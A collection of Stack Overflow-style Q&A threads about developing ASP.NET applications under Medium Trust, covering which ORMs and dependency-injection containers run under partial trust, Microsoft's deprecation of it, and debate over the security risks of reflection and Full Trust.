Is trying to develop for Medium Trust a lost cause? - asp.net

I started developing a new MVC app with Entity Framework code-first and Unity for dependency injection. I used EF5 and Unity because I thought they were supposed to work in Medium Trust. However, when I threw the <trust level="Medium" /> tag in my web.config, I started getting Reflection Permission exceptions.
It always seems like whenever I go beyond using built-in things like the System.Data.SqlClient ADO.net stuff I always run into problems in Medium Trust. Auto-Mapper: fail. NHibernate: fail. MySQL: fail. EF5 Code-first: fail. IOC: fail.
Am I just chasing a pipe-dream? Is it possible to achieve a well-architected and testable web application using modern technology that will run in Medium Trust?
In the age of VMs/Virtual Servers/Cloud Computing (and even a few shared hosts that will set your application pools to Full Trust) has anyone found developing for Medium Trust to be worth the effort?

The official position of the ASP.NET team is that Medium Trust is obsolete. This means a few things:
We are automatically resolving all Medium Trust-related bugs reported to us as "won't fix".
We have provided guidance to hosters that they should migrate away from Medium Trust and use proper OS-level isolation instead (http://support.microsoft.com/kb/2698981).
We are removing Medium Trust support from the frameworks we develop (MVC, WebAPI, SignalR, and so on). Going forward, applications built on these frameworks will require Full Trust.
Here, the term "Medium Trust" above to refers to all non-Full Trust configurations in ASP.NET, including use of the built-in trust levels (Minimal, Low, Medium, High) or any custom trust levels.
Edit 26 May 2015: The .NET Framework as a whole has deprecated partial trust, and customers are advised not to rely on it as a security boundary. From MSDN:
Code Access Security in .NET Framework should not be used as a
security boundary with partially trusted code, especially code of
unknown origin. We advise against loading and executing code of
unknown origins without putting alternative security measures in
place.

In general everything that needs Reflection in deep way can't run on Medium Trust
In your case:
Automapper: use reflection to discover matching properties and memory stream to clone them (there is a version around that actually works in medium trust with some limitation)
NHIbernate: use reflection emit to allow Lazy Loading becase the lazy loading in NH is implemented by proxies (to avoid this you can disable Lazy Loading or to use a the NHibernate ProxyGenerator that is an utility that help to pre-create Proxies)
Nhibernate ProxyGenerator
EF: Actually I didn't find big issues with EF and Medium Trust....is don't serialize object with associations or collections
IoC: IoC is the Killer Application of reflection :) you can try AutoFac that works on Medium Trust
AutoFac
In general Medium Trust is a big limitation...but it all depends on what kind of project you are working on.
Consider also to use some Full Trust hosting like Arvixe
Hope this helps

Related

Moving from Castle Windsor to an IoC that runs under Medium Trust

I've inherited a project which was running on a host who had set up Full Trust, as this is required for the Castle Windsor IoC. The new host, however, will only run in Medium Trust (as do most shared hosting providers), so I need to replace Windsor with another IoC.
Being fairly new to IoC, I'm not sure which framework(s) are best to use under Medium Trust and with the Service Locator model.
An example of existing registration code is as follows:
IWindsorContainer container = new WindsorContainer();
ControllerBuilder.Current.SetControllerFactory(new WindsorControllerFactory(container));
container.RegisterControllers(typeof(HomeController).Assembly);
container.Register(
Component.For(typeof(IEntityDuplicateChecker))
.ImplementedBy(typeof(EntityDuplicateChecker))
.Named("entityDuplicateChecker"));
container.Register(
AllTypes
.FromAssemblyNamed("Salient.Website.Data")
.Pick()
.WithService.FirstNonGenericCoreInterface("Salient.Website.Core"));
container.Register(
AllTypes
.FromThisAssembly()
.Pick()
.WithService.FirstNonGenericCoreInterface("Salient.Website.ApplicationServices"));
ServiceLocator.SetLocatorProvider(() => new WindsorServiceLocator(container));
It would save me a lot of trial-and-error with each framework, if I had some guidance of which ones will be suitable, work under medium trust shared hosting, and hopefully an example of translating the above to get started.
The partial trust requirement of your hoster is odd, since Microsoft has provided guidance to hosters that they should migrate away from Medium Trust and use proper OS-level isolation instead (see here and here and here). The official position of the ASP.NET team is that Medium Trust is obsolete, which means that new features and frameworks wont be tested for partial trust support and bugs in that area won't get fixed.
Nevertheless, there are other frameworks that will run in partial trust:
Simple Injector (which I maintain) is designed and tested for partial trust scenarios.
Ninject has special builds for medium trust environments.
There might be others, but these are the ones I know of.

NHibernate 3.3.3 Medium Trust simple site not working out of the box

I have created a simple bare web site with NHibernate running under Medium Trust and despite all the research I have done saying it should work I can not get the simplest of examples working. Here are my steps
Create new web site in VS2012 targeting .Net 4.0.
Add FluentNHibernate via NuGet. Also add NHibernate.DependencyInjection package. Also installs NHibernate 3.3.3.
Configure web.config to run in Medium Trust.
Create simple session factory. Connect to a MSSQL database. Use CurrentSessionContext(typeof(ManagedWebSessionContext).FullName)
At this point, everyone seems to suggest all you have to do in Application_Start is call
NHibernate.DependencyInjection.Initializer.RegisterBytecodeProvider();
But when I do that I get the dreaded System.Security.Permissions.ReflectionPermission. Looking at the source of DependencyInjection it suggests that ReflectionPermission is supposed to be granted for the injection stuff to work. But Medium Trust explicitly forbids ReflectionPermission. If I just skip the DependencyInjection stuff and try to use NHibernate as-is (which some people seem to suggest might just work) then I still get the same SecurityExceptions.
So you see the catch-22 that I am in. It sounds like I need to use DependencyInjection to get Medium Trust to work, yet DependencyInjection requires permission that Medium Trust doesn't provide.
IIRC, NH3 will not run in a default Medium Trust environment.
It can run in customized "medium trust" configurations that some shared hosting providers use. You need to test with the specific policy you will be targeting.

Does NInject work in medium trust hosting?

I'm doing shared hosting with GoDaddy and I developed a sample ASP.NET MVC app using Castle Windsor and unfortunately, it didn't work in a medium trust setting. Specifically, I got this error: "[SecurityException: That assembly does not allow partially trusted callers"... etc. GoDaddy is sadly not flexible in their trust policy.
I'm not tied to Windsor and would like to try another one that will work under Medium Trust. I'd actually like to use NInject, but I've read people having mixed success. The only one I've read that works with no problem is Microsoft's Unity.
My question is, does NInject work in medium trust? If not, what are my options?
Some DI frameworks use lightweight code generation and don't work in medium trust. NInject is one of them. You may try setting the UseReflectionBasedInjection switch to true which will use reflection which might be worth a try if performance is not an issue for you.
If you want Windsor working under partial trust you currently have to build it from source with the AllowPartiallyTrustedCallersAttribute. The easiest way to do this is using horn, see this thread.
Otherwise take a look at Unity or AutoFac, I think they have the APTCA by default.

What risk does Reflection pose? (Medium Trust)

The lack of reflection in Medium Trust hosting environments seems to cause a lot of problems for many popular web applications.
Why is ReflectionPermission disabled by default with Medium Trust?
What risk does reflection pose in a shared hosting environment?
For random reference, see MSDN: How to use Medium Trust in ASP.NET 2.0
Reflection allows malicious code to inspect all kinds of secrets: not so much intellectual property (though sure, that too), but data that should be private and secure, like connection strings, passwords, bank account data, etc..
Of course, many programs expose this data as a matter of course through even more-easily compromised vectors, but there's no reason to increase an application's attack surface.
Edited to bring some of the conversation up from the comments:
It's probably true that the real risk is unrestricted file system access, which is what turns reflection into a real danger. If a bad actor can get an assembly (or something that gets compiled into an assembly) into your virtual directory, you're in trouble if they have reflection permission. (Of course if this happens, there are other potential problems as well, but that shouldn't discount this particular vulnerability.)
In a shared hosting environment that's just harder to prevent, though it certainly isn't impossible. Perhaps it's worth cross-posting this question to ServerFault to see what the good folks there have to say.
I've never found anything 'bad' that a user will be able to do using reflection.
People get scared off because you're able to call methods that are marked as private or protected, but from what I've seen, none of them impose any real risk.
Most likely, it's at least in part a sales technique to get you to shell out for (semi-) dedicated hosting :)
I found the following MSDN article on this subject:
Security Considerations for Reflection
This article echo's Jeff's answer:
Reflection provides the ability to
obtain information about types and
members, and to access members.
Accessing nonpublic members could
create a security risk. Therefore,
code that accesses nonpublic members
requires ReflectionPermission with the
appropriate flags.
However, I don't believe this risk can be exploited between customer's hosting accounts. It appears this would only pose a personal risk. For example, using reflection I could explore my own assemblies in my hosting environment. Other customers, however, could not use reflection to explore my assemblies. They could only explore their assemblies.
This might pose a problem for a single web application that involves multiple development teams. One development team could use reflection to explore another development team's assemblies.
However, this is a rare scenario for a shared hosting environment. Most shared hosting web sites involve a very small team who have full access to all the code. In other words, there are no secrets. As long as the assembly is safe from other shared hosting customers, then it's not a problem.
Enabling reflection shouldn't pose any risk for most shared hosting web applications:
<IPermission class="ReflectionPermission" version="1" Flags="RestrictedMemberAccess"/>
Please correct me if I'm wrong.

ASP.NET - Trust Level = Full?

I recently joined a firm and when analyzing their environment I noticed that the SharePoint web.config had the trust level set to Full. I know this is an absolutely terrible practice and was hoping the stackoverflow community could help me outline the flaws in this decision.
Oh, it appears this decision was made to allow the developers to deploy dlls to the Bin folder without creating CAS policies. Sigh.
Just want to clarify and make matters worse, we are also deploying third party code to this web application.
Todd,
The book, "Programming Microsoft ASP.Net 3.5", by Dino Espisito provides some sound reasoning for not allowing Full Trust in ASP.Net applications.
Among other reasons, Dino states that web applications exposed to the internet are "one of the most hostile environments for computer security you can imagine." And:
a publicly exposed fully trusted
application is a potential platform
for hackers to launch attacks. The
less an application is trusted, the
more secure that application happens
to be.
I'm surprised the StackOverflow community did not outline the problem with Full Trust better. I was hoping for the same thing so I didn't have to go digging through my pile of books to find the answer, lazy me.
If they're ignoring the CAS policies, it might be a tough sell to get them to dial it back, since it makes their job a little harder (or, at least, a little less forgiving). Changing security practices is always tough - like when I had to convince my boss that using the SA accounts in the SQL connection string of our web applications was a bad idea - but hang in there.
Full Trust allows the application to escalate to control of any resource on the computer. While you'd have to have a security flaw in your application to allow these, and they'll probably claim that they've prevented any escalations through astute programming, remind them that in the case that something happens, wouldn't they rather the web application didn't have control of the whole computer? I mean, just in case?
EDIT: I was a little overzealous with my language here. Full Trust would allow the application to control whatever it wants, but only if the Application Pool process has sufficient rights to do it. So if you're running as a limited user with no rights on the server except what the applicaition needs, then I suppose there's essentially no risk to "Full Trust". The reality is that the app pool owner most likely has a number of rights you wouldn't want your app to have (and in some cases, many, many more), so it's much safer to limit app security and grant additional rights needs individually to the application. Thanks for the correction, Barry.
Flaws? Many. But the most damning thing is straight out of the CAS utility:
"...it allows full access to your computer's resources such as the file system or network access, potentially operating outside the control of the security system."
That means, code granted Full Trust can execute any other piece of code (managed or otherwise) on the system, can call across the network to any machine, can do anything in the file system (including changing permissions on restricted files - even OS files).
Most web programmers would say "that's not a problem, it's just my code," which is fine.... until a security flaw crops up in their code that allows an attacker to use it to do unsavoury things. Then previously-granted Full Trust becomes quite unfortunate.
I honestly have found sharepoint to be too restrictive.
Take a look at the following page to see what can and cannot be done based on trust levels
http://msdn.microsoft.com/en-us/library/ms916855.aspx
One problem I ran into immediately was I could not use the Caching Application Block. We were using this application block instead of the ASP.NET caching because we had used an MVP pattern and may open up a win forms application.
Another problem is no reflection, this caused the About page to fail because the version number is pulled from the metadata of the assembly.
I think the best solution is to not use Sharepoint as an application host. I would only use Sharepoint as an application host if the amount of coding was so small that it didn't affect the trust level and it would be less work then setting up a new application. If you are doing some type of coding which is starting to hit the walls of the trust level, move your application into a proper ASP.NET enviroment. But that is just me, and I am biased. Maybe you should try to aim for a Medium trust level compromise.
I use full trust on my development machines.. so I can deploy to the BIN when building new code.
I trust my own code and run it in the GAC on production because creating CAS policies is a pain.
The third party thing would have me worried.. however:
Most 3rd party solutions found on the web also deploy to the GAC (assuming for the same reasons). This gives them all rights regardless of trust level.
Feels like it has more to do with if you trust the 3rd parties or not.. and do you really trust your own developers?
What would a hacker do?
The scenario where a hacker drops an evil dll in your BIN folder I don't see as very realistic.. regardless if he can do that he can also probably change the trust level.

Resources